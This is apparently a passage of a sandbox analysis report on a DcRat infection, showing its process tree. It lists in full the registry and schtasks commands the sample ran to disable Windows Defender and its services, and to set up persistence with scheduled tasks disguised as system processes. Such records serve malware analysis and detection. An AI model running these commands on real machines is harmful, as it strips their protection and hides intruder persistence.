C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"42⤵PID:4732
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:243⤵PID:4708
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"43⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat"44⤵PID:2468
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:245⤵PID:976
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"45⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"46⤵PID:4656
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:247⤵PID:2696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵PID:2280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- DcRat
- Modifies Windows Defender Real-time Protection settings
PID:4748
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:3640
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:316
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:208
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1888
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2784
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4676
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:704
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1652
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:4948
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:800
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:3484
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4688
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:5020
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:3916
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:3396
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:2020
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:3556
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:3024
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:440
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:4940
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:2260
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:4600
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:808
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2220
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3220
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:4564
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\lsass.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Public\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4184
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "comcommon" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4724
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2992
Network
MITRE ATT&CK Enterprise v15
Downloads